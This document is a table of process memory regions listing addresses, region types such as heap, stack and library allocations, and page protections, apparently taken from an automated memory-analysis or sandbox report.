1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8D60000
|
trusted library allocation
|
page read and write
|
||
|
20567B24000
|
heap
|
page read and write
|
||
|
1CAD647D000
|
heap
|
page read and write
|
||
|
1C2D42F6000
|
heap
|
page read and write
|
||
|
1760A670000
|
heap
|
page read and write
|
||
|
2056BB4F000
|
heap
|
page read and write
|
||
|
1C2D5D6D000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1A5E5370000
|
trusted library section
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1CAD649A000
|
heap
|
page read and write
|
||
|
20567A90000
|
remote allocation
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B090000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6141000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1FD6525E000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
187264FC000
|
heap
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
7FFD9B242000
|
trusted library allocation
|
page read and write
|
||
|
2056ACC1000
|
trusted library allocation
|
page read and write
|
||
|
4348000
|
direct allocation
|
page read and write
|
||
|
20566D60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B458000
|
trusted library allocation
|
page read and write
|
||
|
1872626C000
|
heap
|
page read and write
|
||
|
205679C3000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
2056BD22000
|
trusted library allocation
|
page read and write
|
||
|
1B9A7740000
|
heap
|
page execute and read and write
|
||
|
1A5E6120000
|
trusted library allocation
|
page read and write
|
||
|
20566BD2000
|
heap
|
page read and write
|
||
|
7DA8DFE000
|
stack
|
page read and write
|
||
|
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1A5E4D02000
|
heap
|
page read and write
|
||
|
1CAD67E1000
|
heap
|
page read and write
|
||
|
1B9A7C90000
|
heap
|
page read and write
|
||
|
14E37B8D000
|
trusted library allocation
|
page read and write
|
||
|
1B9BFF80000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD6194000
|
trusted library allocation
|
page read and write
|
||
|
1887CA80000
|
heap
|
page read and write
|
||
|
14E4E0C6000
|
heap
|
page read and write
|
||
|
1CAD6800000
|
heap
|
page read and write
|
||
|
24642FD000
|
stack
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B9A7CC5000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1414000
|
heap
|
page read and write
|
||
|
1CAD88E0000
|
heap
|
page read and write
|
||
|
1CAD6832000
|
heap
|
page read and write
|
||
|
1CAD67E1000
|
heap
|
page read and write
|
||
|
14E3602F000
|
trusted library allocation
|
page read and write
|
||
|
2056BD2C000
|
trusted library allocation
|
page read and write
|
||
|
1760C5F0000
|
heap
|
page execute and read and write
|
||
|
1A5EA4EF000
|
heap
|
page read and write
|
||
|
172204D000
|
stack
|
page read and write
|
||
|
1887C825000
|
heap
|
page read and write
|
||
|
1CAD8B20000
|
trusted library allocation
|
page read and write
|
||
|
20566CD9000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6489000
|
heap
|
page read and write
|
||
|
18726236000
|
heap
|
page read and write
|
||
|
20566BDC000
|
heap
|
page read and write
|
||
|
3994000
|
heap
|
page read and write
|
||
|
18810075000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1B9A7E81000
|
trusted library allocation
|
page read and write
|
||
|
18726228000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1667000
|
heap
|
page read and write
|
||
|
187262B2000
|
heap
|
page read and write
|
||
|
1CAD67E5000
|
heap
|
page read and write
|
||
|
1CAD89D3000
|
heap
|
page read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
1CAD6806000
|
heap
|
page read and write
|
||
|
14E4DF9E000
|
heap
|
page read and write
|
||
|
1B9A8325000
|
trusted library allocation
|
page read and write
|
||
|
18810210000
|
trusted library allocation
|
page read and write
|
||
|
7DA89FE000
|
stack
|
page read and write
|
||
|
2056BD18000
|
trusted library allocation
|
page read and write
|
||
|
205679AA000
|
heap
|
page read and write
|
||
|
18810001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B450000
|
trusted library allocation
|
page read and write
|
||
|
1CAD67E1000
|
heap
|
page read and write
|
||
|
2056BE17000
|
trusted library allocation
|
page read and write
|
||
|
2056BB68000
|
heap
|
page read and write
|
||
|
1CAD6130000
|
trusted library allocation
|
page read and write
|
||
|
1479000
|
heap
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
1872626C000
|
heap
|
page read and write
|
||
|
205679D0000
|
heap
|
page read and write
|
||
|
3A5D000
|
heap
|
page read and write
|
||
|
1CAD6806000
|
heap
|
page read and write
|
||
|
2056BBF2000
|
heap
|
page read and write
|
||
|
3DE3000
|
heap
|
page read and write
|
||
|
7FFD9B423000
|
trusted library allocation
|
page read and write
|
||
|
1CAD63AE000
|
heap
|
page read and write
|
||
|
1C2D41E0000
|
trusted library allocation
|
page read and write
|
||
|
3D6A000
|
heap
|
page read and write
|
||
|
1760C685000
|
trusted library allocation
|
page read and write
|
||
|
14E33CCA000
|
heap
|
page read and write
|
||
|
20567B78000
|
heap
|
page read and write
|
||
|
1880169B000
|
trusted library allocation
|
page read and write
|
||
|
1760CB3E000
|
trusted library allocation
|
page read and write
|
||
|
210C000
|
heap
|
page read and write
|
||
|
7FFD9B2E0000
|
trusted library allocation
|
page read and write
|
||
|
1A5E4CFC000
|
heap
|
page read and write
|
||
|
205679C3000
|
heap
|
page read and write
|
||
|
1CAD60D0000
|
trusted library allocation
|
page read and write
|
||
|
205679BE000
|
heap
|
page read and write
|
||
|
7FFD9B2B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B500000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
|
1CAD63CF000
|
heap
|
page read and write
|
||
|
1CAD645E000
|
heap
|
page read and write
|
||
|
1887C7FA000
|
heap
|
page read and write
|
||
|
1CAD67E9000
|
heap
|
page read and write
|
||
|
7FFD9B0A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8910000
|
heap
|
page read and write
|
||
|
1CAD8C0E000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6801000
|
heap
|
page read and write
|
||
|
7FFD9B2D0000
|
trusted library allocation
|
page read and write
|
||
|
3DD7000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
380B000
|
heap
|
page read and write
|
||
|
18726223000
|
heap
|
page read and write
|
||
|
3968000
|
heap
|
page read and write
|
||
|
14E33D0D000
|
heap
|
page read and write
|
||
|
1CAD8910000
|
heap
|
page read and write
|
||
|
1881001D000
|
trusted library allocation
|
page read and write
|
||
|
1887C7AF000
|
heap
|
page read and write
|
||
|
1CAD6806000
|
heap
|
page read and write
|
||
|
1C2D41A3000
|
trusted library allocation
|
page read and write
|
||
|
11CF000
|
stack
|
page read and write
|
||
|
20567140000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1C2D43EE000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
20567B28000
|
heap
|
page read and write
|
||
|
7FFD9B1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
14E33EA0000
|
trusted library allocation
|
page read and write
|
||
|
15A2000
|
heap
|
page read and write
|
||
|
1554000
|
heap
|
page read and write
|
||
|
1887E874000
|
heap
|
page read and write
|
||
|
834817E000
|
stack
|
page read and write
|
||
|
163D000
|
heap
|
page read and write
|
||
|
2CA47FE000
|
unkown
|
page readonly
|
||
|
2CA51FE000
|
unkown
|
page readonly
|
||
|
1B9A7E9B000
|
trusted library allocation
|
page read and write
|
||
|
205679AA000
|
heap
|
page read and write
|
||
|
18800683000
|
trusted library allocation
|
page read and write
|
||
|
1FD65020000
|
heap
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
1CAD6439000
|
heap
|
page read and write
|
||
|
11CE000
|
stack
|
page read and write
|
||
|
20567B1B000
|
heap
|
page read and write
|
||
|
1CAD88ED000
|
heap
|
page read and write
|
||
|
2056BC43000
|
heap
|
page read and write
|
||
|
7FFD9B350000
|
trusted library allocation
|
page read and write
|
||
|
2056BD22000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA206000
|
trusted library allocation
|
page read and write
|
||
|
20566D18000
|
trusted library allocation
|
page read and write
|
||
|
1A5E5400000
|
heap
|
page read and write
|
||
|
20567B06000
|
heap
|
page read and write
|
||
|
2056798D000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
20567B7C000
|
heap
|
page read and write
|
||
|
834873E000
|
stack
|
page read and write
|
||
|
3E32000
|
heap
|
page read and write
|
||
|
18801489000
|
trusted library allocation
|
page read and write
|
||
|
205679BE000
|
heap
|
page read and write
|
||
|
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
2056BB5E000
|
heap
|
page read and write
|
||
|
7FFD9B444000
|
trusted library allocation
|
page read and write
|
||
|
2056BE19000
|
trusted library allocation
|
page read and write
|
||
|
2056BE19000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B176000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B490000
|
trusted library allocation
|
page read and write
|
||
|
1760CB6E000
|
trusted library allocation
|
page read and write
|
||
|
1C2D5BB8000
|
heap
|
page read and write
|
||
|
2056BB56000
|
heap
|
page read and write
|
||
|
2CA5B7E000
|
stack
|
page read and write
|
||
|
20566D98000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B140000
|
trusted library allocation
|
page read and write
|
||
|
1A5E4C6E000
|
heap
|
page read and write
|
||
|
15C5000
|
heap
|
page read and write
|
||
|
1CAD6559000
|
trusted library allocation
|
page read and write
|
||
|
1CAD60D9000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6472000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1760C773000
|
trusted library allocation
|
page read and write
|
||
|
397C000
|
heap
|
page read and write
|